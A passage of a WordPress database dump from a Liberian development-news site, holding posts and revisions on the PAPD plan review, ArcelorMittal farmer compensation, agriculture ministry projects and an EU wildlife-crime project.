programs within the PAPD will be slim, thereby affecting the overall achievement of the major targets. Given the current macroeconomic outlook of our country, the attainment of the original targets of the PAPD reminds unrealistic, leading us to reconsider in the context of the COVID-19 and the current realities. Based on these, the revision and reprogramming of the PAPD being considered. Said revision would consider assessing the impact of the targets, the economic recovery interventions to reposition the PAPD, and accelerated actions needed to meet key targets of the PAPD. More besides, COVID 19 pandemic has placed restraints on the Government of Liberia ability) to undertake extensive review PAPD and develop investment plan and strategy dealing with the COVID related shocks. Therefore, revising the PAPD and developing an investment plan will essentially require funding.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Expert-to-Conduct-Desk-Review-of-the-PAPD.docx\" target=\"_blank\" rel=\"noopener\">Expert Consultant Services Needed</a></strong></em>','Expert to Conduct Desk Review of the PAPD','','publish','closed','closed','','expert-to-conduct-desk-review-of-the-papd','','','2022-09-21 16:14:55','2022-09-21 16:14:55','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5119',63,'ekms_bulletin','',0),(5120,42,'2022-09-21 16:14:05','2022-09-21 16:14:05','','Expert to Conduct Desk Review of the PAPD','','inherit','open','closed','','expert-to-conduct-desk-review-of-the-papd','','','2022-09-21 16:14:05','2022-09-21 16:14:05','',0,'https://ekmsliberia.info/wp-content/uploads/2022/09/Expert-to-Conduct-Desk-Review-of-the-PAPD.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5121,42,'2022-09-21 16:14:55','2022-09-21 16:14:55','In Liberia’s implementation of national development plan, Pro-Poor Agenda for Prosperity and Development (PAPD), in the second year, was embraced with the COVID 19, which has greatly affected economic activities, resource mobilization both domestically and internationally. The spread of COVID-19 in the global economy affected domestic resource mobilization especially taxes on international trade, taxes on goods and services, rental, and corporation taxes on global and national lockdowns. As the revenue generation capacities get lower, the funding of the programs within the PAPD will be slim, thereby affecting the overall achievement of the major targets. Given the current macroeconomic outlook of our country, the attainment of the original targets of the PAPD reminds unrealistic, leading us to reconsider in the context of the COVID-19 and the current realities. Based on these, the revision and reprogramming of the PAPD being considered. Said revision would consider assessing the impact of the targets, the economic recovery interventions to reposition the PAPD, and accelerated actions needed to meet key targets of the PAPD. More besides, COVID 19 pandemic has placed restraints on the Government of Liberia ability) to undertake extensive review PAPD and develop investment plan and strategy dealing with the COVID related shocks. Therefore, revising the PAPD and developing an investment plan will essentially require funding.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Expert-to-Conduct-Desk-Review-of-the-PAPD.docx\" target=\"_blank\" rel=\"noopener\">Expert Consultant Services Needed</a></strong></em>','Expert to Conduct Desk Review of the PAPD','','inherit','closed','closed','','5119-revision-v1','','','2022-09-21 16:14:55','2022-09-21 16:14:55','',5119,'https://ekmsliberia.info/?p=5121',0,'revision','',0),(5122,42,'2022-09-23 11:01:50','2022-09-23 11:01:50','<!-- wp:paragraph -->\n<p>Yekepa, Nimba) ─ Fifty (50) local farmland owners near Yekepa, Nimba County were the latest batch of joyful recipients of over USD $138,188 (One hundred thirty-eight thousand one hundred eighty-eight United States Dollars) in resettlement compensations from ArcelorMittal Liberia (AML). In continuing the successful implementation of the resettlement program, farmers whose tree crops and other farm properties have been counted and verified within the 500-meter buffer zone near Mount Yuelliton, Tuesday excitedly received their respective payments at the Area-B School in Yekepa, with the highest amount paid to a single farmer being USD $6,513.46 (Six thousand five hundred thirteen dollars forty-six cents). The 50 farmers benefiting from the latest round of compensation are from the town of Lugbeyee.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The AML Community Relations department confirmed that including the recent transaction, the company has now paid more than USD $ 18 million in resettlement compensation to farmers and it is expected that the amount will further increase.ArcelorMittal Liberia’s resettlement program follows both the Government of Liberia’s (GOL) laws and international best practices. The Resettlement Program focuses on evaluating assets and compensating affected farmers in areas where ArcelorMittal Liberia operates. Mining in a sustainable manner, preserving cultural heritage, and building and maintaining strong relations with local communities while operating in an environmentally friendly manner remain major hallmarks of ArcelorMittal. On June 7, 2022, an earlier batch of 50 farmers whose crops were also within the 500-meter buffer zone near Mount Yuelliton received a combined sum of USD $139,907.01.39. (One hundred thirty-nine thousand nine hundred and seven dollars), with the single highest payee receiving USD $10,000 (Ten thousand United States Dollars).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also on July 11, 2022, ArcelorMittal Liberia paid US$137,717 to 23 farmers whose crops were counted in the 500-meter buffer zone near Yuelliton, with the highest payee taking home $11,210.98 while the second in rank took home $10,313.50. Since the start of its operations in Liberia, ArcelorMittal Liberia has prioritized proper resettlement of owners of farmlands and crops within the specified areas close to its mining operations. Local farmers in communities close to ArcelorMittal Liberia’s operations are key stakeholders and a primary beneficiary group for many of the company’s sustainable agriculture and livelihood programs like the Conversation Agriculture program which helps farmers reduce the practice of shifting cultivation through the introduction of low technology improvement to ensure food security.</p>\n<!-- /wp:paragraph -->','Arcelor Mittal Liberia Pays Over US$18 Million in Resettlement Compensation to Farmers in Nimba','','publish','open','closed','','arcelor-mittal-liberia-pays-over-us18-million-in-resettlement-compensation-to-farmers-in-nimba','','','2022-09-23 11:01:52','2022-09-23 11:01:52','',0,'https://ekmsliberia.info/?p=5122',99,'post','',0),(5123,42,'2022-09-23 11:01:30','2022-09-23 11:01:30','','arcelormittal','','inherit','open','closed','','arcelormittal','','','2022-09-23 11:01:30','2022-09-23 11:01:30','',5122,'https://ekmsliberia.info/wp-content/uploads/2022/09/arcelormittal.jpg',0,'attachment','image/jpeg',0),(5124,42,'2022-09-23 11:01:50','2022-09-23 11:01:50','<!-- wp:paragraph -->\n<p>Yekepa, Nimba) ─ Fifty (50) local farmland owners near Yekepa, Nimba County were the latest batch of joyful recipients of over USD $138,188 (One hundred thirty-eight thousand one hundred eighty-eight United States Dollars) in resettlement compensations from ArcelorMittal Liberia (AML). In continuing the successful implementation of the resettlement program, farmers whose tree crops and other farm properties have been counted and verified within the 500-meter buffer zone near Mount Yuelliton, Tuesday excitedly received their respective payments at the Area-B School in Yekepa, with the highest amount paid to a single farmer being USD $6,513.46 (Six thousand five hundred thirteen dollars forty-six cents). The 50 farmers benefiting from the latest round of compensation are from the town of Lugbeyee.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The AML Community Relations department confirmed that including the recent transaction, the company has now paid more than USD $ 18 million in resettlement compensation to farmers and it is expected that the amount will further increase.ArcelorMittal Liberia’s resettlement program follows both the Government of Liberia’s (GOL) laws and international best practices. The Resettlement Program focuses on evaluating assets and compensating affected farmers in areas where ArcelorMittal Liberia operates. Mining in a sustainable manner, preserving cultural heritage, and building and maintaining strong relations with local communities while operating in an environmentally friendly manner remain major hallmarks of ArcelorMittal. On June 7, 2022, an earlier batch of 50 farmers whose crops were also within the 500-meter buffer zone near Mount Yuelliton received a combined sum of USD $139,907.01.39. (One hundred thirty-nine thousand nine hundred and seven dollars), with the single highest payee receiving USD $10,000 (Ten thousand United States Dollars).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also on July 11, 2022, ArcelorMittal Liberia paid US$137,717 to 23 farmers whose crops were counted in the 500-meter buffer zone near Yuelliton, with the highest payee taking home $11,210.98 while the second in rank took home $10,313.50. Since the start of its operations in Liberia, ArcelorMittal Liberia has prioritized proper resettlement of owners of farmlands and crops within the specified areas close to its mining operations. Local farmers in communities close to ArcelorMittal Liberia’s operations are key stakeholders and a primary beneficiary group for many of the company’s sustainable agriculture and livelihood programs like the Conversation Agriculture program which helps farmers reduce the practice of shifting cultivation through the introduction of low technology improvement to ensure food security.</p>\n<!-- /wp:paragraph -->','Arcelor Mittal Liberia Pays Over US$18 Million in Resettlement Compensation to Farmers in Nimba','','inherit','closed','closed','','5122-revision-v1','','','2022-09-23 11:01:50','2022-09-23 11:01:50','',5122,'https://ekmsliberia.info/?p=5124',0,'revision','',0),(5125,42,'2022-08-27 11:54:00','2022-08-27 11:54:00','<!-- wp:paragraph -->\n<p>The Ministry of Agriculture, through its Smallholder Agriculture Transformation and Agribusiness Revitalization Project (STAR-P) has ended its engagements on organizational capacity building and knowledge management for Farmers’ Based Organizations (FBOs) cooperatives and individual businesses. STAR-P is funded by the World Bank and the International Fund for Agricultural Development (IFAD)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meetings were held in regional clusters, and began in the west on August 21, 2022, with Bomi, Cape Mount and Gbarpolu counties. 30 participants attended the two days event that broadened their knowledge and understanding of agribusiness. The second meeting took place on August 26 &amp; 27, 2022 in Ganta, Nimba County and brought together 35 participants from Lofa, Margibi and Nimba Counties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Remarking at the Ganta meeting, the Operations Manager of STAR-P Stephen Marvie said the forum was necessary to prepare for the new norm of agriculture. “The end game is to encourage our farmers to develop the attitude of doing agriculture as a business. If we can achieve this, we are sure of developing several millionaires over a period”. He said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He named the project’s County Focal Persons (CFPs) and Business Development Service Providers (BDSPs) in each county where the project is implemented as contact points for agriculture stakeholders to seek support and guidance in their quest to accelerate their agribusiness activities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He added that beneficiaries of the matching grant available under the project, many of which participated in the meetings, will be able to properly apply for grants and other forms of support that are available under the project. “We have sent most of the grant proposals back for it to be rewritten because they lack some of the core requirements. Because the funds are here to benefit you, we want to avoid the situations where people get delayed or denied for simple issues that we are seeing, even though they are qualified to receive the grants. That is one of the reasons why we are holding these meetings”. Marvie said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Several resource persons from the Ministry of Agriculture (MOA), Ministry of Commerce and Industry (MOCI), Cooperative Development Agency (CDA), Farmers Union Network (FUN), the Liberia Business Association (LIBA) and the University of Liberia (UL) facilitated the meetings, speaking on various topics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Deliberating on the topic “Farming as a Business for Smallholder Farmers” Dr. Samuel Gbehgbah Toe, Director of the Center for Strategic Policy and Research at the UL said the process must begin from changing the mindset and behavior of the farmers. “I have seen very rich farmers all over the world. There is no reason why we should always call ourselves poor farmers when we have the land, soil, better climate and now funds to make bigger and better farms. But we must first accept that this is possible, then work towards achieving it”, He said</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also presenting were Julius Y. Saye Kek-nel of the MOCI who took the participants through the basic issues of cooperate management. Archie Glay of FUN deliberated on basic financial management practices for farmers, while Elliott Gaye of the CDA expanded on Cooperative Governance and Structure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participants at both forums lauded the Ministry of Agriculture and development partners for what they termed “positive action to increase their income”.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The STAR Project focuses on the oil palm, rice and vegetable value chains, and is implemented in Bomi, Gbarpolu, Grand Cape Mount, Grand Gedeh and Lofa counties. Other counties include Margibi, Maryland, Nimba and Sinoe.</p>\n<!-- /wp:paragraph -->','Ministry Of Agriculture Holds Organizational Management Capacity Building & Knowledge Sharing Forums For Stakeholders','','publish','open','open','','ministry-of-agriculture-holds-organizational-management-capacity-building-knowledge-sharing-forums-for-stakeholders','','','2022-09-23 11:57:28','2022-09-23 11:57:28','',0,'https://ekmsliberia.info/?p=5125',98,'post','',0),(5126,42,'2022-09-23 11:56:36','2022-09-23 11:56:36','','MOA','','inherit','open','closed','','moa-4','','','2022-09-23 11:56:36','2022-09-23 11:56:36','',5125,'https://ekmsliberia.info/wp-content/uploads/2022/09/MOA.jpg',0,'attachment','image/jpeg',0),(5127,42,'2022-09-23 11:57:26','2022-09-23 11:57:26','<!-- wp:paragraph -->\n<p>The Ministry of Agriculture, through its Smallholder Agriculture Transformation and Agribusiness Revitalization Project (STAR-P) has ended its engagements on organizational capacity building and knowledge management for Farmers’ Based Organizations (FBOs) cooperatives and individual businesses. STAR-P is funded by the World Bank and the International Fund for Agricultural Development (IFAD)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meetings were held in regional clusters, and began in the west on August 21, 2022, with Bomi, Cape Mount and Gbarpolu counties. 30 participants attended the two days event that broadened their knowledge and understanding of agribusiness. The second meeting took place on August 26 &amp; 27, 2022 in Ganta, Nimba County and brought together 35 participants from Lofa, Margibi and Nimba Counties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Remarking at the Ganta meeting, the Operations Manager of STAR-P Stephen Marvie said the forum was necessary to prepare for the new norm of agriculture. “The end game is to encourage our farmers to develop the attitude of doing agriculture as a business. If we can achieve this, we are sure of developing several millionaires over a period”. He said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He named the project’s County Focal Persons (CFPs) and Business Development Service Providers (BDSPs) in each county where the project is implemented as contact points for agriculture stakeholders to seek support and guidance in their quest to accelerate their agribusiness activities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He added that beneficiaries of the matching grant available under the project, many of which participated in the meetings, will be able to properly apply for grants and other forms of support that are available under the project. “We have sent most of the grant proposals back for it to be rewritten because they lack some of the core requirements. Because the funds are here to benefit you, we want to avoid the situations where people get delayed or denied for simple issues that we are seeing, even though they are qualified to receive the grants. That is one of the reasons why we are holding these meetings”. Marvie said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Several resource persons from the Ministry of Agriculture (MOA), Ministry of Commerce and Industry (MOCI), Cooperative Development Agency (CDA), Farmers Union Network (FUN), the Liberia Business Association (LIBA) and the University of Liberia (UL) facilitated the meetings, speaking on various topics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Deliberating on the topic “Farming as a Business for Smallholder Farmers” Dr. Samuel Gbehgbah Toe, Director of the Center for Strategic Policy and Research at the UL said the process must begin from changing the mindset and behavior of the farmers. “I have seen very rich farmers all over the world. There is no reason why we should always call ourselves poor farmers when we have the land, soil, better climate and now funds to make bigger and better farms. But we must first accept that this is possible, then work towards achieving it”, He said</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also presenting were Julius Y. Saye Kek-nel of the MOCI who took the participants through the basic issues of cooperate management. Archie Glay of FUN deliberated on basic financial management practices for farmers, while Elliott Gaye of the CDA expanded on Cooperative Governance and Structure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participants at both forums lauded the Ministry of Agriculture and development partners for what they termed “positive action to increase their income”.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The STAR Project focuses on the oil palm, rice and vegetable value chains, and is implemented in Bomi, Gbarpolu, Grand Cape Mount, Grand Gedeh and Lofa counties. Other counties include Margibi, Maryland, Nimba and Sinoe.</p>\n<!-- /wp:paragraph -->','Ministry Of Agriculture Holds Organizational Management Capacity Building & Knowledge Sharing Forums For Stakeholders','','inherit','closed','closed','','5125-revision-v1','','','2022-09-23 11:57:26','2022-09-23 11:57:26','',5125,'https://ekmsliberia.info/?p=5127',0,'revision','',0),(5128,42,'2022-07-19 12:00:00','2022-07-19 12:00:00','<!-- wp:paragraph -->\n<p>The Ministry of Agriculture, through its the Tree Crops Extension Project (TCEP), is currently distributing over one million cocoa high yielding seedlings to almost 2,500 smallholder farmers in seven districts in Lofa County. The farmers, selected through known and legally registered cooperatives, are based in Foya, Kolahun, Quardu-Gbondi, Salayea, Vahun, Voinjama and Zorzor.  When transplanted, each of the seedling will start fruiting between two to three years. Rome-based International Fund for Agricultural Development (IFAD) funds the TCEP with grants and loans secured by the Government of Liberia through Financing Agreements.The agreements ratified by the National Legislature restrict TCEP’s interventions to Lofa and Nimba Counties only. TCEP is involved in the cocoa farms’ rehabilitation and farmers support through supplies of seedlings, inputs, tools and training of cocoa farmers in the two counties.</p>\n<!-- /wp:paragraph -->','Ministry of Agriculture Distributes Over One Million Cocoa Seedlings in Lofa','','publish','open','closed','','ministry-of-agriculture-distributes-over-one-million-cocoa-seedlings-in-lofa','','','2022-09-23 12:03:22','2022-09-23 12:03:22','',0,'https://ekmsliberia.info/?p=5128',97,'post','',0),(5129,42,'2022-09-23 12:02:29','2022-09-23 12:02:29','','MOA','','inherit','open','closed','','moa-5','','','2022-09-23 12:02:29','2022-09-23 12:02:29','',5128,'https://ekmsliberia.info/wp-content/uploads/2022/09/MOA-1.jpg',0,'attachment','image/jpeg',0),(5130,42,'2022-09-23 12:03:20','2022-09-23 12:03:20','<!-- wp:paragraph -->\n<p>The Ministry of Agriculture, through its the Tree Crops Extension Project (TCEP), is currently distributing over one million cocoa high yielding seedlings to almost 2,500 smallholder farmers in seven districts in Lofa County. The farmers, selected through known and legally registered cooperatives, are based in Foya, Kolahun, Quardu-Gbondi, Salayea, Vahun, Voinjama and Zorzor.  When transplanted, each of the seedling will start fruiting between two to three years. Rome-based International Fund for Agricultural Development (IFAD) funds the TCEP with grants and loans secured by the Government of Liberia through Financing Agreements.The agreements ratified by the National Legislature restrict TCEP’s interventions to Lofa and Nimba Counties only. TCEP is involved in the cocoa farms’ rehabilitation and farmers support through supplies of seedlings, inputs, tools and training of cocoa farmers in the two counties.</p>\n<!-- /wp:paragraph -->','Ministry of Agriculture Distributes Over One Million Cocoa Seedlings in Lofa','','inherit','closed','closed','','5128-revision-v1','','','2022-09-23 12:03:20','2022-09-23 12:03:20','',5128,'https://ekmsliberia.info/?p=5130',0,'revision','',0),(5131,42,'2022-07-04 12:13:00','2022-07-04 12:13:00','<!-- wp:paragraph -->\n<p>The Managing Director of the Forestry Development Authority (FDA), Hon. C. Mike Doryen has commended the European Union Delegation for its support to the FDA and the Wild Chimpanzee Foundation (WCF) and partners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hon. Doryen also expressed the hope for continued cordial working relations between the FDA and partner institutions for the numerous years of collaboration. The FDA boss called for the establishment of a National Community Eco guard Service in the Liberian Forest Sector.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Hon. Doryen, there is also a need to have community members near the forested areas to help protect Liberia’s proposed Protected Areas. He said under the government program, the (FDA) will allow Community Eco guard activities in all landscapes in the Liberian forest.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The FDA Managing Director made the statement on Wednesday, June 22, 2022, at Libassa Ecolodge, Kpan’s Town, Margibi County, during the official closing of phase one of the EU-funded project in Liberian, entitled ‘‘Strengthening local communities and the law enforcement network to combat wildlife and forest crime in Liberia’’. The monetary value of the project is EUR1,875,000 of which EUR1,500 came from the European Union, while EUR 375,000 came from the co-funding of partner institutions. The project has been led by the Wild Chimpanzee Foundation (WCF) while project partners were the Society for the Conservation of Nature of Liberia (SCNL), Liberia Chimpanzee Rescue &amp; Protection (LCRP), Libassa Wildlife Sanctuary (LiWiSa), and the Loyal Society for the Protection of Birds (RSPB).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Besides more than 200 community members engaged as community Ecogaurds around (proposed) protected areas in northwestern and southeastern Liberia, as well as 34 female bushmeat sellers who were of a community volunteer program in Monrovia and Paynesville, the main beneficiaries of the project were the Forestry Development Authority (FDA), the Forestry Training Institution (FTI), the Environmental Protection Agency, the Ministry of Justice, and the Liberia National Police through the Transnational Organized Crime Unit and Interpol.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For her part, the Country Director for Wild Chimpanzee Foundation (WCF), Dr.Annika Hillers, said the project&nbsp;&nbsp; brought together many partner institutions and other stakeholders</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Hillers thanked&nbsp; the (FDA) Wildlife Confiscation Unit, the core member of the National Wildlife Crime Task Force that was established and operationalized by the project, for its hard work on the field and expressed the hope for a renewed project from the level of the European Union.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She thanked the former female bush meat seller in the community volunteer program for their tireless efforts in protecting the sale of bush meat (wildlife). She also commented on other achievements, particularly the establishment of the national Community Eco guard program which had been polite at Grebo-Krahn National Park since 2014.The project helps WCF and partners to support about 250 community Eco guards across Liberia through collaboration with community members.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a brief statement, the Board Chairman of FDA, Hon. Harrison S. Karnwea,Sr. thanked all forest donor partners that assisted in the area of conservation. Hon. Karnwea said awareness should be based on climate change-related effects on the global community.The FDA board chairman also called for the safety of all forest-protected areas and further urged everyone to be a tourism ambassador to the Liberian forest.Hon. Karnwea said doing so will encourage more investors in Liberia and help in raising more revenue for the government.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a welcome remark, the Executive Director of the Society for Conservation of Nature (SCL), Michael F. Garbo, recognized all partners and said the bush meat trade has been reduced for the past three and half years through the support of the European Union to Liberia and believed that the project has done what they could do and prayed for a renewed program under the same EU project soon.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Meanwhile, the European Union Program Manager, Stephan Cocco, deputizing for the keynote speaker (EU Ambassador), commended the Wild Chimpanzee Foundation (WCF) Country Director Dr. Annika Hillers for her hard work, as well as other partners for their support. He said Liberia owns many key necessities, and abundant natural resources, unlike many other countries around the world. “Species of wildlife are unique to Liberia, the natural heritage can contribute to the development and the growth of Liberia,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Cocco also noted that having the political will is the highest level to save Liberia’s unique forest, and biodiversity and to ratify many international conventions, including the biodiversity convention and the implementation to improve the governance of the Voluntary Partnership Agreement (VPA ) in the Liberian Forestry sectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The president of the Liberia Marketing Association (LMA), Mrs. Elizabeth Sambolah assured the FDA and partners, that the bush meat trade will reduce from 50 percent to 75 percent before the end of August 2022. She promised to work with her marketers from now to August.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hon. Prince Tokpah, Chairman of House Committee Agriculture, Fisheries and Forestry, thanked the Wild Chimpanzee Foundation and its partners for their hard work in the forest and asked that Superintendents and other government officials must stand tall with FDA and WCF in the protection of Liberia’s wildlife in the Liberian forest.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, Margibi County Senator, Dr. Jim W. Tornonlah, Chairman of the Senate Committee on Agriculture, Fisheries, and Forestry, said promoting the idea of discouraging the destruction of the bush meat trade is very welcoming.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Senator Tornonlah described the change as something that is good but equally painful. He also called on partners to step up their gains to support the protection of wildlife in Liberia and urged the Ministry of Internal Affairs to have a focal person to work with the FDA in the rural parts of Liberia to prosecute violators.</p>\n<!-- /wp:paragraph -->','EU Funded Project on Combating Wildlife & Forest Crime Celebrates Achievements','','publish','open','closed','','eu-funded-project-on-combating-wildlife-forest-crime-celebrates-achievements','','','2022-09-23 12:14:01','2022-09-23 12:14:01','',0,'https://ekmsliberia.info/?p=5131',96,'post','',0),(5132,42,'2022-09-23 12:12:49','2022-09-23 12:12:49','','fda','','inherit','open','closed','','fda-2','','','2022-09-23 12:12:49','2022-09-23 12:12:49','',5131,'https://ekmsliberia.info/wp-content/uploads/2022/09/fda-1.png',0,'attachment','image/png',0),(5133,42,'2022-09-23 12:13:23','2022-09-23 12:13:23','<!-- wp:paragraph -->\n<p>The Managing Director of the Forestry Development Authority (FDA), Hon. C. Mike Doryen has commended the European Union Delegation for its support to the FDA and the Wild Chimpanzee Foundation (WCF) and partners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hon. Doryen also expressed the hope for continued cordial working relations between the FDA and partner institutions for the numerous years of collaboration. The FDA boss called for the establishment of a National Community Eco guard Service in the Liberian Forest Sector.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Hon. Doryen, there is also a need to have community members near the forested areas to help protect Liberia’s proposed Protected Areas. He said under the government program, the (FDA) will allow Community Eco guard activities in all landscapes in the Liberian forest.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The FDA Managing Director made the statement on Wednesday, June 22, 2022, at Libassa Ecolodge, Kpan’s Town, Margibi County, during the official closing of phase one of the EU-funded project in Liberian, entitled ‘‘Strengthening local communities and the law enforcement network to combat wildlife and forest crime in Liberia’’. The monetary value of the project is EUR1,875,000 of which EUR1,500 came from the European Union, while EUR 375,000 came from the co-funding of partner institutions. The project has been led by the Wild Chimpanzee Foundation (WCF) while project partners were the Society for the Conservation of Nature of Liberia (SCNL), Liberia Chimpanzee Rescue &amp; Protection (LCRP), Libassa Wildlife Sanctuary (LiWiSa), and the Loyal Society for the Protection of Birds (RSPB).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Besides more than 200 community members engaged as community Ecogaurds around (proposed) protected areas in northwestern and southeastern Liberia, as well as 34 female bushmeat sellers who were of a community volunteer program in Monrovia and Paynesville, the main beneficiaries of the project were the Forestry Development Authority (FDA), the Forestry Training Institution (FTI), the Environmental Protection Agency, the Ministry of Justice, and the Liberia National Police through the Transnational Organized Crime Unit and Interpol.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For her part, the Country Director for Wild Chimpanzee Foundation (WCF), Dr.Annika Hillers, said the project&nbsp;&nbsp; brought together many partner institutions and other stakeholders</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Hillers thanked&nbsp; the (FDA) Wildlife Confiscation Unit, the core member of the National Wildlife Crime Task Force that was established and operationalized by the project, for its hard work on the field and expressed the hope for a renewed project from the level of the European Union.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She thanked the former female bush meat seller in the community volunteer program for their tireless efforts in protecting the sale of bush meat (wildlife). She also commented on other achievements, particularly the establishment of the national Community Eco guard program which had been polite at Grebo-Krahn National Park since 2014.The project helps WCF and partners to support about 250 community Eco guards across Liberia through collaboration with community members.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a brief statement, the Board Chairman of FDA, Hon. Harrison S. Karnwea,Sr. thanked all forest donor partners that assisted in the area of conservation. Hon. Karnwea said awareness should be based on climate change-related effects on the global community.The FDA board chairman also called for the safety of all forest-protected areas and further urged everyone to be a tourism ambassador to the Liberian forest.Hon. Karnwea said doing so will encourage more investors in Liberia and help in raising more revenue for the government.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a welcome remark, the Executive Director of the Society for Conservation of Nature (SCL), Michael F. Garbo, recognized all partners and said the bush meat trade has been reduced for the past three and half years through the support of the European Union to Liberia and believed that the project has done what they could do and prayed for a renewed program under the same EU project soon.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Meanwhile, the European Union Program Manager, Stephan Cocco, deputizing for the keynote speaker (EU Ambassador), commended the Wild Chimpanzee Foundation (WCF) Country Director Dr. Annika Hillers for her hard work, as well as other partners for their support. He said Liberia owns many key necessities, and abundant natural resources, unlike many other countries around the world. “Species of wildlife are unique to Liberia, the natural heritage can contribute to the development and the growth of Liberia,” he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Cocco also noted that having the political will is the highest level to save Liberia’s unique forest, and biodiversity and to ratify many international conventions, including the biodiversity convention and the implementation to improve the governance of the Voluntary Partnership Agreement (VPA ) in the Liberian Forestry sectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The president of the Liberia Marketing Association (LMA), Mrs. Elizabeth Sambolah assured the FDA and partners, that the bush meat trade will reduce from 50 percent to 75 percent before the end of August 2022. She promised to work with her marketers from now to August.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hon. Prince Tokpah, Chairman of House Committee Agriculture, Fisheries and Forestry, thanked the Wild Chimpanzee Foundation and its partners for their hard work in the forest and asked that Superintendents and other government officials must stand tall with FDA and WCF in the protection of Liberia’s wildlife in the Liberian forest.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, Margibi County Senator, Dr. Jim W. Tornonlah, Chairman of the Senate Committee on Agriculture, Fisheries, and Forestry, said promoting the idea of discouraging the destruction of the bush meat trade is very welcoming.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Senator Tornonlah described the change as something that is good but equally painful. He also called on partners to step up their gains to support the protection of wildlife in Liberia and urged the Ministry of Internal Affairs to have a focal person to work with the FDA in the rural parts of Liberia to prosecute violators.</p>\n<!-- /wp:paragraph -->','EU Funded Project on Combating Wildlife & Forest Crime Celebrates Achievements','','inherit','closed','closed','','5131-revision-v1','','','2022-09-23 12:13:23','2022-09-23 12:13:23','',5131,'https://ekmsliberia.info/?p=5133',0,'revision','',0),(5134,42,'2022-07-25 12:14:00','2022-07-25 12:14:00','<!-- wp:paragraph -->\n<p>The Forestry Development Authority (FDA) through the Liberia Forest Sector Project (LFSP) has embarked on a communication campaign to increase public awareness about the REDD+ and to communicate some of the key milestones of the project since its inception five years ago.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>REDD stands for Reduced Emission from Deforestation and Degradation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is a framework created by the United Nations Conference of the Parties (<a href=\"https://unfccc.int/process/bodies/supreme-bodies/conference-of-the-parties-cop\">COP</a>) to guide activities in the forestry sector on the sustainable management of forests and the conservation and 